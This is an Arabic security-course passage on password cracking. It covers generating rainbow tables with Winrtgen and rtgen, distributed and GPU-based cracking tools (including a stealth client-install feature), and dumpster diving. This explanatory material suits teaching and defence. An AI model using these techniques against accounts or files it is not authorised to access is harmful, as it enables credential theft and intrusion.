‫اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﻣوس ﺑﺎﺳﺗﺧدام داﻟﺔ اﻟﮭﺎش‪ ،‬وﻣن ﺛم ﻣﻘﺎرﻧﺗﮭﺎ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور ﻣﺷﻔرة‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺣﺻل ﻋﻠﻰ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر‬
‫اﻟﺗﻲ ھﻲ ﻋﺑﺎرة ﻋن ﻛﻠﻣﺎت ﻣدرﺟﺔ ﻓﻲ اﻟﻘﺎﻣوس‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪329‬‬

‫ﺗﺧزﯾن اﻟﮭﺎش ﯾﺗطﻠب ﻣﺳﺎﺣﺔ ذاﻛرة ﻛﺑﯾرة ﻣﺛل ‪ LM hash‬واﻟذي ﯾﺣﺗﺎج ‪ 310‬ﺗﯾراﺑﺎﯾت وﻛذﻟك ‪ 15> NT hash‬ﺣرف ﯾﺗطﻠب‬
‫‪ 5652897009‬إﻛﺳﺎ ﺑﺎﯾت‪ .‬اﺳﺗﺧدام ﺗﻘﻧﯾﺔ ‪ time-space tradeoff technique‬وذﻟك ﻟﻠﺣد ﻣن ﻣﺳﺎﺣﺔ اﻟذاﻛرة اﻟﻣطﻠوﺑﺔ ﻟﺗﺧزﯾن اﻟﮭﺎش‪.‬‬

‫‪Tools to Create Rainbow Tables: Winrtgen and Rtgen‬‬

‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء ﺟداول ‪ Rainbow Tables‬ﺑﺎﺳﺗﺧدام اﻷدوات اﻟﺗﺎﻟﯾﺔ‪:‬‬


‫‪Winrtgen‬‬

‫اﻟﻣﺻدر‪http://www.oxid.it/projects.html :‬‬
‫‪ Winrtgen‬ھو اداه رﺳوﻣﯾﺔ ﻷﻧﺷﺎء ﺟداول ‪ Rainbow Tables‬واﻟﺗﻲ ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫وھو ﯾدﻋم اﻟﮭﺎﺷﺎت اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5,‬‬
‫‪SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384) and‬‬
‫‪SHA-2 (512) hashes‬‬
‫طرﯾﻘﺔ اﻟﻌﻣل‪:‬‬
‫‪ -1‬ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ﺗطﺑﯾﻖ اﻟﺑرﻧﺎﻣﺞ ‪ Winrtgen.exe‬ﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -2‬ﻧﻧﻘر ﻓوق ‪ Add Table‬ﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪330‬‬

‫‪ -3‬ﻓﻲ اﻟﺷرﯾط اﻟﻌﻠوي ﻋﻧد اﻟﻘﯾم ‪ HASH‬ﻧﺟد اﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﮭﺎش اﻟذي ﯾدﻋﻣﮫ ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ﺳو ﻧﺧﺗﺎر‪ ntlm‬ﺛم ﺗﺣت‬
‫اﻟﻌﻧوان ‪ Min Len‬واﻟﺗﻲ ﺗﻌﺑر ﻋن اﻗل طول ﻟﻠﮭﺎش ﻧﺧﺗﺎر‪ 4‬و‪ Max Len‬ﻧﺧﺗﺎر ‪ 9‬اﻣﺎ ﺗﺣت ‪ chain count‬ﻧﺧﺗﺎر ‪.4000000‬‬
‫‪ -4‬ﻓﻲ اﻟﺧﺎﻧﺔ اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﻌﻧوان ‪ Charset‬ﻧﺧﺗﺎر ‪ loweralpha‬واﻟﺗﻲ ﺗﻌﻧﻰ اﻟﺣروف اﻟﺻﻐﯾرة وھذا ﻋﻠﻰ ﺣﺳب ﻧوع ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪ -5‬ﺛم ﻧﻧﻘر ﻓوق ‪ ok‬ﻹﻧﺷﺎء اﻟﻣﻠف‪.‬‬

‫‪ -6‬ﺛم ﻧﻧﻘر ﻓوق ‪ ok‬ﻹﻧﺷﺎء اﻟﻣﻠف‪.‬‬


‫‪ -7‬اﻧﺷﺎء ﺟدول اﻟﮭﺎش ﺳوف ﯾﺄﺧذ ﺑﻌض ﻣن اﻟوﻗت اﻋﺗﻣﺎدا ﻋﻠﻰ اﺧﺗﯾﺎرك ﻟﻧوع ‪ hash‬و‪.charset‬‬
‫‪Rtgen‬‬

‫اﻟﻣﺻدر‪http://www.project-rainbowcrack.com :‬‬
‫‪ Rainbowcrack‬ھو ﺗﻧﻔﯾذ ﻻﻗﺗراح ﻋﺎم واﻟذى ﯾﺳﺗﻔﯾد ﻣن ﺗﻘﻧﯾﺔ ‪ time-memory trade-off technique‬ﻟﻛﺳر اﻟﮭﺎش‪ .‬ﯾﺳﻣﺢ ھذا‬
‫اﻟﻣﺷروع ﻟك ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﯾﺗم اﺳﺗﺧدام أداة ‪ rtgen‬اﻟﻣﺗوﻓرة ﻓﻲ ھذا اﻟﻣﺷروع ﻟﺗوﻟﯾد ﺟداول ‪ .Rainbow table‬ﯾﺣﺗﺎج ‪rtgen‬‬
‫اﻟﻌدﯾد ﻣن اﻟﻣﻌﺎﻣﻼت ﻟﺗوﻟﯾد ﺟدول ‪Rainbow table‬؛ ﯾﻣﻛﻧك اﺳﺗﺧدام ﺑﻧﺎء اﻟﺟﻣﻠﺔ اﻟﺗﺎﻟﻲ ﻣن ﺳطر اﻷواﻣر ﻟﺗوﻟﯾد ﺟداول ‪:Rainbow table‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪331‬‬

‫ھذا اﻟﺗطﺑﯾﻖ ﻟﻧظﺎﻣﻲ اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ووﯾﻧدوز‪ .‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#rtgen©hash_algorithm©charset©plaintext_len_min©plaintext_len_max©table_index©chain_len‬‬
‫‪chain_num©part_index‬‬

‫‪Offline Attack: Distributed Network Attacks‬‬


‫)‪ Distributed Network Attack (DNA‬ھﻲ اﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻻﺳﺗﻌﺎدة اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ ﺑﻛﻠﻣﺔ ﻣرور‪ .‬ﺣﯾث إﻧﮫ ﯾﺳﺗﺧدم ﻗوة‬
‫اﻟﻣﻌﺎﻟﺟﺔ اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ ﻣن اﻵﻻت ﻋﺑر اﻟﺷﺑﻛﺔ ﻟﻔك ﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﻓﻲ ھذا اﻟﮭﺟوم‪ ،‬ﺗم ﺗﺛﺑﯾت ‪ DNA manager‬ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي‬
‫ﺣﯾث ﯾﻣﻛن ﻟﻶﻻت اﻟذﯾن ﯾﻘوﻣون ﺑﺗﺷﻐﯾل ‪ DNA client‬ﯾﻣﻛﻧﮭم اﻟوﺻول إﻟﯾﮫ ﻋﺑر اﻟﺷﺑﻛﺔ‪ DNA manager .‬ﯾﻧﺳﻖ اﻟﮭﺟوم‪ ،‬ﺗﻛﻠﯾف ﺟزء‬
‫ﺻﻐﯾر ﻣن ‪ key search‬ﻟﻶﻻت ﺣﺗﻰ ﯾﻛون ﺗوزﯾﻊ اﻟﻌﻣل ﻓﻲ ﺟﻣﯾﻊ اﻟﻣﻌﺎﻟﺟﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﺷﺑﻛﺔ‪ .‬ﯾدار ‪ DNA client‬ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪،‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ﻓﻘط اﻟﺟزء اﻟﻐﯾر ﻣﺳﺗﺧدم ﻣن اﻟﻣﻌﺎﻟﺞ‪ .‬اﻟﺑرﻧﺎﻣﺞ ﯾﺟﻣﻊ ﺑﯾن ﻗدرات اﻟﻣﻌﺎﻟﺞ ﻟﻛﺎﻓﺔ أﺟﮭزة اﻟﻌﻣﻼء اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ وﯾﺳﺗﺧدﻣﮭﺎ‬
‫ﻹﺟراء ﺑﺣث رﺋﯾﺳﯾﺔ ﻋﻠﻰ ‪ Office 97‬و‪ 2000‬ﻟﻔك ﺗﺷﻔﯾرھم‪.‬‬
‫ﻣﻣﯾزات ‪:DNA‬‬
‫‪ -‬ﯾﻘرأ اﻹﺣﺻﺎءات واﻟرﺳوم اﻟﺑﯾﺎﻧﯾﺔ ﺑﺳﮭوﻟﺔ‬
‫‪ -‬ﯾﺿﯾف ﻗواﻣﯾس اﻟﻣﺳﺗﺧدم ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‬
‫‪ -‬ﯾﺣﺳن ھﺟﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻐﺎت ﻣﻌﯾﻧﺔ‬
‫‪ -‬ﯾﻌدل ﻗواﻣﯾس اﻟﻣﺳﺗﺧدم‬
‫‪ -‬ﯾﺿم وظﯾﻔﺔ ‪.stealth client installation‬‬
‫‪ -‬ﯾﻘوم ﺑﺎﻟﺗﺣدﯾث اﻟﺗﻠﻘﺎﺋﻲ ﻟﻠﻌﻣﯾل أﺛﻧﺎء ﺗﺣدﯾث ﺧﺎدم ‪.DNA‬‬
‫‪ -‬ﺗﺳﯾطر ﻋﻠﻰ اﻟﻌﻣﻼء وﺗﺣدد اﻟﻌﻣل اﻟذي ﯾﻘوم ﺑﮫ اﻟﻌﻣﻼء‪.‬‬

‫ﻧﺟد ان ‪ DNA‬ﯾﻧﻘﺳم اﻟﻰ وﺣدﺗﯾن )‪ (2Module‬ﻛﺎﻻﺗﻰ‪:‬‬


‫‪DNA Server Interface -1‬‬
‫واﺟﮭﺔ ﺧﺎدم ‪ (DNA Server Interface) DNA‬ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻹدارة ‪ DNA‬ﻣن ﺧﺎدم‪ .‬ﺗوﻓر وﺣدة ﺧﺎدم ‪(DNA Server Module) DNA‬‬
‫ﻟﻠﻣﺳﺗﺧدم وﺿﻊ ﺟﻣﯾﻊ اﻟوظﺎﺋف اﻟﺗﻲ ﯾﻘوم ‪ DNA‬ﺑﺗﻧﻔﯾذھﺎ‪ .‬وﺗﻧﻘﺳم ھذه اﻟواﺟﮭﺔ إﻟﻰ‪:‬‬

‫اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ)‪ : (Current jobs‬ھﻲ ﻋﺑﺎره ﻋن ﻗﺎﺋﻣﺔ اﻧﺗظﺎر ﻟﺟﻣﯾﻊ اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ اﻟﺗﻲ ﺗم إﺿﺎﻓﺗﮭﺎ ﻣن ﻗﺑل وﺣدة ﺗﺣﻛم‪ .‬ﻗﺎﺋﻣﺔ‬
‫اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ )‪ (Current jobs list‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻷﻋﻣدة‪ ،‬ﻣﺛل رﻗم اﻟﮭوﯾﺔ )‪ (ID‬اﻟﺗﻲ ﺗم ﺗﻌﯾﯾﻧﮭﺎ ﻣن ﻗﺑل ‪ DNA‬ﻟﻛل وظﯾﻔﺔ‪ ،‬واﺳم‬
‫اﻟﻣﻠف اﻟﻣﺷﻔر‪ ،‬وﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬وﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗطﺎﺑﻖ اﻟﻣﻔﺗﺎح اﻟذي ﯾﻣﻛن أن ﯾﻔﺗﺢ اﻟﺑﯾﺎﻧﺎت‪ ،‬ووﺿﻊ ھذه‬
‫اﻟﻣﮭﻣﺔ‪ ،‬وأﻋﻣدة أﺧرى ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ )‪ :(Finished jobs‬ﺗوﻓر ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ )‪ (Finished jobs list‬اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟوظﺎﺋف اﻟﺗﻲ ﯾﻣﻛن ﻓك‬
‫ﺗﺷﻔﯾرھﺎ ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ ﻟدﯾﮫ أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻷﻋﻣدة اﻟﺗﻲ ﺗﺷﺑﮫ ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ‪ .‬ﺗﺷﻣل ھذه اﻷﻋﻣدة‬
‫اﻟرﻗم اﻟﺗﻌرﯾﻔﻲ اﻟﻣﻌﯾن ﻣن ﻗﺑل ‪ DNA‬ﻟﮭذه اﻟوظﯾﻔﺔ‪ ،‬واﺳم اﻟﻣﻠف اﻟﻣﺷﻔر‪ ،‬ﻣﺳﺎر ﻓك اﻟﻣﻠف‪ ،‬واﻟﻣﻔﺗﺎح اﻟﻣﺳﺗﺧدم ﻓﻲ اﻟﺗﺷﻔﯾر وﻓك‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪332‬‬

‫ﺗﺷﻔﯾر اﻟﻣﻠف‪ ،‬اﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺗﺧذه ﺧﺎدم ‪ DNA‬ﻟﻠﻌﻣل ﻋﻠﻰ اﻟوظﯾﻔﺔ‪ ،‬اﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺗﺧذه ﺧﺎدم ‪ DNA‬ﻟﻼﻧﺗﮭﺎء ﻣن اﻟﻌﻣل ﻋﻠﻰ‬
‫وظﯾﻔﺔ‪ ،‬واﻟوﻗت اﻟﻣﻧﻘﺿﻰ‪ ،‬اﻟﺦ‪.‬‬

‫‪DNA Client Interface -2‬‬


‫واﺟﮭﺔ ﻋﻣﯾل ‪ (DNA Client Interface) DNA‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن اﻟﻌدﯾد ﻣن ﻣﺣطﺎت اﻟﻌﻣل)‪ .(workstation‬إﺣﺻﺎءات اﻟﻌﻣﯾل ﯾﻣﻛن‬
‫ﺗﻧﺳﯾﻘﮭﺎ ﺑﺳﮭوﻟﺔ ﺑﺎﺳﺗﺧدام واﺟﮭﺔ ﻋﻣﯾل ‪ .DNA‬ﺗﺗوﻓر ھذه اﻟواﺟﮭﺔ ﻋﻠﻰ اﻷﺟﮭزة ﺣﯾث ﺗم ﺗﺛﺑﯾت ﺗطﺑﯾﻖ اﻟﻌﻣﯾل ‪ .DNA‬ھﻧﺎك اﻟﻌدﯾد ﻣن‬
‫اﻟﻌﻧﺎﺻر اﻟﺗﻲ ﺗﺣﺗوﯾﮭﺎ ﻣﺛل اﺳم ﻋﻣﯾل ‪ ،DNA‬اﺳم اﻟﻣﺟﻣوﻋﺔ اﻟﺗﻲ ﯾﻧﺗﻣﻲ إﻟﯾﮭﺎ ﻋﻣﯾل ‪ ،DNA‬وإﺣﺻﺎءات ﻋن اﻟوظﯾﻔﺔ اﻟﺣﺎﻟﯾﺔ)‪، (current job‬‬
‫واﻟﻌدﯾد ﻣن اﻟﻣﻛوﻧﺎت اﻷﺧرى‪.‬‬
‫إدارة اﻟﺸﺒﻜﺔ‬
‫ﺗطﺑﯾﻖ رﺻد ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ )‪ (The Network Traffic application‬ﯾﺳﺗﺧدم ﻓﻲ وﯾﻧدوز ﻟﻐرض إدارة اﻟﺷﺑﻛﺔ‪ .‬ﻣرﺑﻊ اﻟﺣوار‬
‫ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ )‪ (The Network Traffic dialog box‬ﯾﺳﺗﺧدم ﻟﻣﻌرﻓﺔ ﺳرﻋﺔ اﻟﺷﺑﻛﺔ اﻟﺗﻲ ﯾﺳﺗﺧدﻣﮭﺎ ‪ DNA‬وﻛل طول وﺣدة‬
‫ﻋﻣل )‪ (work unit length‬ﻣن ‪ .DNA Client‬ﺑﺎﺳﺗﺧدام طول وﺣدة اﻟﻌﻣل)‪ ، (work unit length‬ﯾﻣﻛن ﻟﻌﻣﯾل ‪ DNA‬ان ﯾﻌﻣل ﻣن‬
‫دون اﻻﺗﺻﺎل ﺑﺧﺎدم ‪ .DNA‬ﺗطﺑﯾﻖ ‪ DNA Client‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻻﺗﺻﺎل ﺑﺧﺎدم ‪ DNA‬ﻓﻲ ﺑداﯾﺔ وﻧﮭﺎﯾﺔ طول وﺣدة اﻟﻌﻣل‪ .‬ﯾﻣﻛن‬
‫ﻟﻠﻣﺳﺗﺧدم ﻣراﻗﺑﺔ ﺣﺎﻟﺔ ﻗﺎﺋﻣﺔ اﻧﺗظﺎر اﻟﻌﻣل و‪ .DNA‬ﻋﻧدﻣﺎ ﯾﺗم ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﻣن ﻣرﺑﻊ ﺣوار ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ‪ ،‬ﯾﻣﻛن إﺟراء ﺗﻌدﯾل ﻋﻠﻰ‬
‫وﺣدة اﻟﻌﻣل اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣﯾل‪ .‬ﻋﻧدﻣﺎ ﯾزداد ﺣﺟم طول وﺣدة اﻟﻌﻣل )‪ (work unit length‬ﻓﺎن ﺳرﻋﺔ ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ ﺗﻘل‪ .‬إذا ﺗم‬
‫ﺧﻔض ﺣرﻛﺔ اﻟﻣرور‪ ،‬ﻓﺈن ﻋﻣل ﺟﮭﺎز اﻟﻌﻣﯾل ﻋﻠﻰ اﻟوظﺎﺋف ﯾﺗطﻠب ﻗدرا أطول ﻣن اﻟوﻗت‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﻣﻛن أن ﺗﻛون اﻟطﻠﺑﺎت اﻟﺗﻲ ﺗﻘدم إﻟﻰ‬
‫اﻟﻣﻠﻘم أﻗل ﺑﺳﺑب اﻧﺧﻔﺎض ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ‪.‬‬
‫‪Elcomsoft Distributed Password Recovery‬‬

‫اﻟﻣﺻدر‪http://www.elcomsoft.com :‬‬
‫‪ Elcomsoft Distributed Password Recovery‬ﯾﺳﻣﺢ ﻟك ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻌﻘدة ‪ ،‬واﺳﺗﻌﺎدة ﻣﻔﺎﺗﯾﺢ اﻟﺗﺷﻔﯾر اﻟﻘوﯾﺔ ‪ ،‬و ﻓﺗﺢ‬
‫اﻟﻣﺳﺗﻧدات ﻓﻲ ﺑﯾﺋﺔ اﻹﻧﺗﺎج‪ .‬ﻷﻧﮭﺎ ﺗﺗﯾﺢ ﺗﻧﻔﯾذ اﻛواد ﻣﻛﺛﻔﺔ ﺣﺳﺎﺑﯾﺎ ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﻣوازﯾﺔ ﺣﺳﺎﺑﯾﺎ ﺑﺷﻛل ﻛﺑﯾر ﻟﻠﻌﻧﺎﺻر اﻟﻣوﺟودة ﻓﻲ‬
‫ﻣﺳرﻋﺎت اﻟرﺳوﻣﺎت اﻟﺣدﯾﺛﺔ‪ .‬ھذه اﻟﺗﻘﻧﯾﺔ ﻣﺑﺗﻛرة ﻟﺗﺳرﯾﻊ اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﻋﻧد وﺟود ﺑطﺎﻗﺔ رﺳوﻣﯾﮫ ‪ ATI‬أو ‪ NVIDIA‬ﻣوﺟودة وﻣﺗواﻓﻘﺔ‬
‫ﺑﺎﻹﺿﺎﻓﺔ ﻣﻊ وﺿﻊ وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزي ﻓﻘط‪ .‬ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ طرق اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗﺳﺗﺧدم ﻓﻘط وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ اﻟرﺋﯾﺳﯾﺔ‬
‫ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﺗﺳرﯾﻊ ‪ GPU‬اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ ﯾﺟﻌل اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﺑﺷﻛل أﺳرع‪ .‬ھذا ﯾدﻋم اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر‬
‫ﻟﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﺗطﺑﯾﻘﺎت وﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ھذا اﻟﺗطﺑﯾﻖ ھو ﻣﺛﺎل ‪ Distributed Network Attacks‬وﻟﻛن ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻋﺗﻣﺎده ﻋﻠﻰ وﺣدة اﻟﻣﻌﺎﻟﺞ اﻟﻣرﻛزي ﻓﺎﻧﮫ‬
‫ﯾﻌﺗﻣد ﻋﻠﻰ ﻣﻌﺎﻟﺞ ﻛروت اﻟﺷﺎﺷﺔ اﻟﺣدﯾﺛﺔ ‪ GPU‬أﯾﺿﺎ‪.‬‬
‫اﻟﻣﯾزات‪ :‬ﻓواﺋد‬
‫‪ -1‬ﯾﻘﻠل ﻣن اﻟوﻗت اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪ Distributed password recovery -2‬ﻋﻠﻰ ‪ ،LAN‬اﻹﻧﺗرﻧت‪ ،‬أو ﻛﻠﯾﮭﻣﺎ‪.‬‬
‫‪ Solace management -3‬ﻟﺳﮭوﻟﺔ اﻟﺳﯾطرة ﻣن أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﺗﺻل ﺑﺎﻟﺷﺑﻛﺔ‪.‬‬
‫‪ Plug-in architecture -4‬ﯾﺳﻣﺢ ﻟﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت إﺿﺎﻓﯾﺔ‪.‬‬
‫‪ -5‬اﻟﺗﺣﻛم اﻟﻣرن ﻓﻲ ﻗﺎﺋﻣﺔ اﻻﻧﺗظﺎر ﯾﺗﯾﺢ إدارة اﻟوظﺎﺋف ﺑﺳﮭوﻟﮫ‪.‬‬
‫‪ -6‬ﺗﺛﺑﯾت وإزاﻟﺔ ﻋﻣﻼء اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﻋن ﺑﻌد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪333‬‬

‫‪Non-Electronic Attacks‬‬

‫اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ ‪ Non-Electronic Attacks‬ﯾطﻠﻖ ﻋﻠﯾﮭﺎ أﯾﺿﺎ ھﺟﻣﺎت ﻏﯾر ﺗﻘﻧﯾﺔ‪ . Non-Technical Attacks‬ھذا اﻟﻧوع‬
‫ﻣن اﻟﮭﺟﻣﺎت ﻻ ﯾﺗطﻠب أي ﻣﻌرﻓﺔ ﺗﻘﻧﯾﺔ ﺣول طرق اﻟﺗدﺧل ﻣﻊ ﻧظﺎم آﺧر‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﯾدﻋﻰ ھﺟوم ﻏﯾر إﻟﻛﺗروﻧﯾﺔ‪ .‬ھﻧﺎك أرﺑﻌﺔ أﻧواع ﻣن‬
‫اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ‪ ،‬واﻟﺗﻲ ھﻲ‪(Dumpster Diving، Keyboard Sniffing، Shoulder Surfing،Social Engineering) :‬‬

‫‪ Dumpster Diving‬ھو وﺳﯾﻠﺔ اﻟﮭﺟوم اﻟرﺋﯾﺳﯾﺔ اﻟﺗﻲ ﺗﺳﺗﮭدف ﺑﻧﺎ ًء ﻋﻠﻰ ﻓﺷل ﻛﺑﯾر ﻓﻲ أﻣن اﻟﻛﻣﺑﯾوﺗر‪ :‬اﻟﻣﻌﻠوﻣﺎت اﻟﻣﮭم ﺟدا اﻟذى ﯾﺳﻌﻰ‬
‫اﻟﻧﺎس ﻟﺣﻣﺎﯾﺗﮭﺎ واﻣﻧﮭﺎ ‪ ،‬ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﻗﺑل أي ﺷﺧص ﺗﻘرﯾﺑﺎ ﻋﻠﻰ اﺳﺗﻌداد ﻟﻠﺗدﻗﯾﻖ ﻓﻲ اﻟﻘﻣﺎﻣﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت‬
‫ﺣول ﻛﻠﻣﺎت اﻟﻣرور اﻟﮭدف ﻋن طرﯾﻖ اﻟﻧظر ﻣن ﺧﻼل ﺳﻠﺔ اﻟﻣﮭﻣﻼت‪ .‬ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ‪ low-tech attack‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻵﺛﺎر‪.‬‬
‫ﻧظرا ﻻﻧﺧﻔﺎض ﻣﺳﺗوى اﻷﻣن ﻋن ھذه اﻻﯾﺎم‪ ،‬ﻓﻛﺎن ﻓﻲ اﻟواﻗﻊ ‪ Dumpster Diving‬ذات ﺷﻌﺑﯾﺔ ﻛﺑﯾرة ﻓﻲ ‪ .1980‬ﻣﺻطﻠﺢ "‬
‫‪ " Dumpster Diving‬ﯾﺷﯾر إﻟﻰ أي ﻣن اﻟﻣﻌﻠوﻣﺎت ﺳواء اﻟﻌﺎﻣﺔ او اﻟﻣﻔﯾدة اﻟﺗﻲ وﺟدت او اﺧذت ﻣن اﻟﻣﻧﺎطﻖ ﺣﯾث ﯾﺗم اﻟﺗﺧﻠص ﻣﻧﮭﺎ‪.‬‬
‫وﺗﺷﻣل ھذه اﻟﻣﻧﺎطﻖ ﺻﻔﺎﺋﺢ اﻟﻘﻣﺎﻣﺔ وﺣﺎوﯾﺎت اﻟرﺻﯾف‪ ،‬ﻣﻛﺑﺎت اﻟﻧﻔﺎﯾﺎت‪ ،‬وﻣﺎ ﺷﺎﺑﮫ ذﻟك‪ ،‬اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت‬
‫ﻣﺟﺎﻧﺎ‪ .‬ﻗد ﺗﺟد ﻣﻠﻔﺎت ﻛﻠﻣﺔ اﻟﺳر واﻷدﻟﺔ واﻟوﺛﺎﺋﻖ اﻟﺣﺳﺎﺳﺔ‪ ،‬واﻟﺗﻘﺎرﯾر‪ ،‬واﻹﯾﺻﺎﻻت‪ ،‬وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬أو اﻷﻗراص اﻟﺗﻲ أﻟﻘﯾت ﺑﻌﯾدا‪.‬‬
